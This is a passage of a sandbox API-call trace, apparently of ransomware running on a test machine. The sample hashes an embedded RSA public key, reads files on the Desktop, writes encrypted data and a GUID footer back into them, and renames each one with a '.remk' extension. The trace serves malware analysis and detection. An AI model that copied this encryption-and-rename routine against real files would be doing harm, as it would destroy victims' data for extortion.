Size=0x1f6) returned 0x31c0d08 [0231.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.268] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.269] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.269] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.269] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.269] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.269] GetLastError () returned 0x0 [0231.269] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.269] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.269] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.269] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.269] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.269] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.270] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x325fd48 [0231.270] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.271] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe6c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.271] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.271] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.271] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.271] CloseHandle (hObject=0x640) returned 1 [0231.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b1b70 [0231.275] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\e6zU.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e6zu.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\e6zU.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e6zu.xlsx.remk")) returned 1 [0231.277] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2be9280, ftCreationTime.dwHighDateTime=0x1d5fd34, ftLastAccessTime.dwLowDateTime=0xf3572900, ftLastAccessTime.dwHighDateTime=0x1d5fd34, ftLastWriteTime.dwLowDateTime=0x598d7d00, ftLastWriteTime.dwHighDateTime=0x1d5fd30, nFileSizeHigh=0x0, nFileSizeLow=0xba000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h1rxxmJek7fnkHTT.exe", cAlternateFileName="H1RXXM~1.EXE")) returned 1 [0231.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe") returned=".exe" [0231.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.278] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=761856) returned 1 [0231.278] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.280] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb9fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.280] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.282] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0231.282] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x25805, lpOverlapped=0x0) returned 1 [0231.284] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.284] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.285] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.285] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.286] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.286] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.286] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.286] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.286] GetLastError () returned 0x0 [0231.286] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.286] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0231.286] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.286] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.286] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.286] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.286] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.287] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25810) returned 0x37c2278 [0231.289] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0231.289] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0231.289] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1320 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd70 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1368 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd88 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddb8 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede18 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31eddd0 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0231.290] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddb8 | out: hHeap=0x630000) returned 1 [0231.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddd0 | out: hHeap=0x630000) returned 1 [0231.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede18 | out: hHeap=0x630000) returned 1 [0231.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0231.290] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ede18 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0231.290] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31eddd0 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31eddb8 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddd0 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eddb8 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede18 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0231.291] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0231.291] GetCurrentThreadId () returned 0x314 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0231.291] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x697498 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.292] GetCurrentThreadId () returned 0x314 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0231.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0231.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0231.292] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0231.292] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0231.293] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xba000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.293] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.294] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0231.294] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.294] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.294] CloseHandle (hObject=0x640) returned 1 [0231.311] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h1rxxmJek7fnkHTT.exe.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1rxxmjek7fnkhtt.exe.remk")) returned 1 [0231.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0231.312] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0231.312] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0231.314] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0231.314] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64b4d2c0, ftCreationTime.dwHighDateTime=0x1d5e564, ftLastAccessTime.dwLowDateTime=0xef6d8c50, ftLastAccessTime.dwHighDateTime=0x1d5e315, ftLastWriteTime.dwLowDateTime=0xef6d8c50, ftLastWriteTime.dwHighDateTime=0x1d5e315, nFileSizeHigh=0x0, nFileSizeLow=0x140e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hl4GPoq4aN.flv", cAlternateFileName="HL4GPO~1.FLV")) returned 1 [0231.314] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl4GPoq4aN.flv") returned=".flv" [0231.314] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Hl4GPoq4aN.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hl4gpoq4an.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.314] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=82146) returned 1 [0231.314] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.316] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x140bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.316] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.318] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x140e2, lpOverlapped=0x0) returned 1 [0231.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.319] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.319] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.320] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.320] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.320] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.321] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.321] GetLastError () returned 0x0 [0231.321] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.321] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.321] HeapFree (in: hHeap=0x630000, 